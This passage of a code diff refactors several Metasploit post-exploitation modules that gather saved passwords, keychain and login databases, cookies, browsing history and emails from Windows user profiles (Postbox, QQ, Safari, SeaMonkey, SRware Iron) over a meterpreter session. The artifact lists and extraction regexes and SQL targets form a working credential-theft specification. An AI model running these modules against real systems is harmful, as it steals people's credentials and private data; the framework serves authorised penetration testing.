-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "draft_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Draft.msf",
-                              "description": "Postbox's unsent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "received_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "INBOX.msf",
-                              "description": "Postbox's received emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "sent_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Sent*.msf",
-                              "description": "Postbox's sent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "sent_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Sent.msf",
-                              "description": "Postbox's sent emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "email_logs",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Templates.msf",
-                              "description": "Postbox's template emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "deleted_emails",
-                              "path": "AppData",
-                              "dir": "PostboxApp",
-                              "artifact_file_name": "Trash.msf",
-                              "description": "Postbox's Deleted emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Postbox credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Postbox credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -331,8 +338,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -343,11 +351,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/postbox.rb
+++ b/modules/post/windows/gather/credentials/postbox.rb
@@ -338,7 +338,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/qq.rb
+++ b/modules/post/windows/gather/credentials/qq.rb
@@ -10,41 +10,50 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'QQ',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'chat_logs',
+          path: 'AppData',
+          dir: 'Tencent',
+          artifact_file_name: 'UserHeadTemp*',
+          description: "QQ's Profile Image",
+          credential_type: 'image'
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'QQ credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for QQ credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "QQ",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "chat_logs",
-                              "path": "AppData",
-                              "dir": "Tencent",
-                              "artifact_file_name": "UserHeadTemp*",
-                              "description": "QQ's Profile Image",
-                              "credential_type": "image"
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'QQ credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for QQ credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -52,8 +61,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -64,11 +74,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/qq.rb
+++ b/modules/post/windows/gather/credentials/qq.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/safari.rb
+++ b/modules/post/windows/gather/credentials/safari.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/safari.rb
+++ b/modules/post/windows/gather/credentials/safari.rb
@@ -10,74 +10,83 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'safari',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Apple Computer',
+          artifact_file_name: 'keychain.plist',
+          description: 'Credentials',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'History',
+          path: 'LocalAppData',
+          dir: 'Apple Computer',
+          artifact_file_name: 'WebpageIcons.db',
+          description: 'Safari History',
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Safari's browsing history",
+              sql_table: 'PageURL',
+              sql_column: 'url'
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Safari credential gatherer',
-                      'Description' => %q{
-                       PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for safari credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "safari",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Apple Computer",
-                              "artifact_file_name": "keychain.plist",
-                              "description": "Credentials",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "History",
-                              "path": "LocalAppData",
-                              "dir": "Apple Computer",
-                              "artifact_file_name": "WebpageIcons.db",
-                              "description": "Safari History",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Safari's browsing history",
-                                  "sql_table": "PageURL",
-                                  "sql_column": "url"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Safari credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for safari credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -85,8 +94,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -97,11 +107,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/seamonkey.rb
+++ b/modules/post/windows/gather/credentials/seamonkey.rb
@@ -10,124 +10,133 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'seamonkey',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'logins.json',
+          description: "Seamonkey's saved Username and Password ",
+          credential_type: 'json',
+          json_search: [
+            {
+              json_parent: "['logins']",
+              json_children: [
+                "['hostname']",
+                "['usernameField']",
+                "['passwordField']",
+                "['encryptedUsername']",
+                "['encryptedPassword']"
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'cert8.db',
+          description: "Seamonkey's saved Username and Password",
+          credential_type: 'database'
+        },
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'key3.db',
+          description: "Seamonkeys's saved Username and Password",
+          credential_type: 'database'
+        },
+        {
+          filetypes: 'web_history',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'formhistory.sqlite',
+          description: "Seamonkey's History",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports seamonkey's Login data",
+              sql_table: 'moz_formhistory',
+              sql_column: 'fieldname, value'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'places.sqlite',
+          description: "Seamonkey's History ",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports seamonkey's Login data",
+              sql_table: 'moz_places',
+              sql_column: 'url'
+            },
+            {
+              sql_description: "Database Commands which exports seamonkey's Login data",
+              sql_table: 'moz_inputhistory',
+              sql_column: 'input'
+            },
+            {
+              sql_description: "Database Commands which exports seamonkey's Login data",
+              sql_table: 'moz_keywords',
+              sql_column: 'keyword'
+            }
+          ]
+        },
+        {
+          filetypes: 'cookies',
+          path: 'AppData',
+          dir: 'Mozilla',
+          artifact_file_name: 'cookies.sqlite',
+          description: "Seamonkey's Cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports seamonkey's Login data",
+              sql_table: 'moz_cookies',
+              sql_column: 'baseDomain, host, name, path, value'
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Seamonkey credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for seamonkey credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "seamonkey",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "logins.json",
-                              "description": "Seamonkey's saved Username and Password ",
-                              "credential_type": "json",
-                              "json_search": [
-                                {
-                                  "json_parent": "['logins']",
-                                  "json_children": [
-                                    "['hostname']",
-                                    "['usernameField']",
-                                    "['passwordField']",
-                                    "['encryptedUsername']",
-                                    "['encryptedPassword']"
-                                  ]
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "cert8.db",
-                              "description": "Seamonkey's saved Username and Password",
-                              "credential_type": "database"
-                            },
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "key3.db",
-                              "description": "Seamonkeys's saved Username and Password",
-                              "credential_type": "database"
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "formhistory.sqlite",
-                              "description": "Seamonkey's History",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports seamonkey's Login data",
-                                  "sql_table": "moz_formhistory",
-                                  "sql_column": "fieldname, value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "places.sqlite",
-                              "description": "Seamonkey's History ",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports seamonkey's Login data",
-                                  "sql_table": "moz_places",
-                                  "sql_column": "url"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports seamonkey's Login data",
-                                  "sql_table": "moz_inputhistory",
-                                  "sql_column": "input"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports seamonkey's Login data",
-                                  "sql_table": "moz_keywords",
-                                  "sql_column": "keyword"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "cookies",
-                              "path": "AppData",
-                              "dir": "Mozilla",
-                              "artifact_file_name": "cookies.sqlite",
-                              "description": "Seamonkey's Cookies",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports seamonkey's Login data",
-                                  "sql_table": "moz_cookies",
-                                  "sql_column": "baseDomain, host, name, path, value"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Seamonkey credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for seamonkey credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -135,8 +144,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -147,11 +157,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/seamonkey.rb
+++ b/modules/post/windows/gather/credentials/seamonkey.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/srware.rb
+++ b/modules/post/windows/gather/credentials/srware.rb
@@ -10,93 +10,102 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'srware',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'Chromium',
+          artifact_file_name: 'Login Data',
+          description: "SRware's sent and received emails",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'logins',
+              sql_column: 'action_url, username_value'
+            }
+          ]
+        },
+        {
+          filetypes: 'cookies',
+          path: 'LocalAppData',
+          dir: 'Chromium',
+          artifact_file_name: 'Cookies',
+          description: "SRware's cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'cookies',
+              sql_column: 'host_key, name, path, value'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'LocalAppData',
+          dir: 'Chromium',
+          artifact_file_name: 'History',
+          description: "SRware's visited websites history",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'urls',
+              sql_column: 'url, title'
+            },
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'downloads',
+              sql_column: 'current_path, site_url'
+            },
+            {
+              sql_description: "Database Commands which exports SRware's Login data",
+              sql_table: 'segments',
+              sql_column: 'name'
+            },
+            {
+              sql_description: 'keyword search terms',
+              sql_table: 'keyword_search_terms',
+              sql_column: 'term'
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Srware credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Srware credentials on a windows remote host. SRWare Iron is a Chromium-based web browser developed by the German company SRWare.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "srware",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "LocalAppData",
-                              "dir": "Chromium",
-                              "artifact_file_name": "Login Data",
-                              "description": "SRware's sent and received emails",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "logins",
-                                  "sql_column": "action_url, username_value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "cookies",
-                              "path": "LocalAppData",
-                              "dir": "Chromium",
-                              "artifact_file_name": "Cookies",
-                              "description": "SRware's cookies",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "cookies",
-                                  "sql_column": "host_key, name, path, value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "LocalAppData",
-                              "dir": "Chromium",
-                              "artifact_file_name": "History",
-                              "description": "SRware's visited websites history",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "urls",
-                                  "sql_column": "url, title"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "downloads",
-                                  "sql_column": "current_path, site_url"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports SRware's Login data",
-                                  "sql_table": "segments",
-                                  "sql_column": "name"
-                                },
-                                {
-                                  "sql_description": "keyword search terms",
-                                  "sql_table": "keyword_search_terms",
-                                  "sql_column": "term"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Srware credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
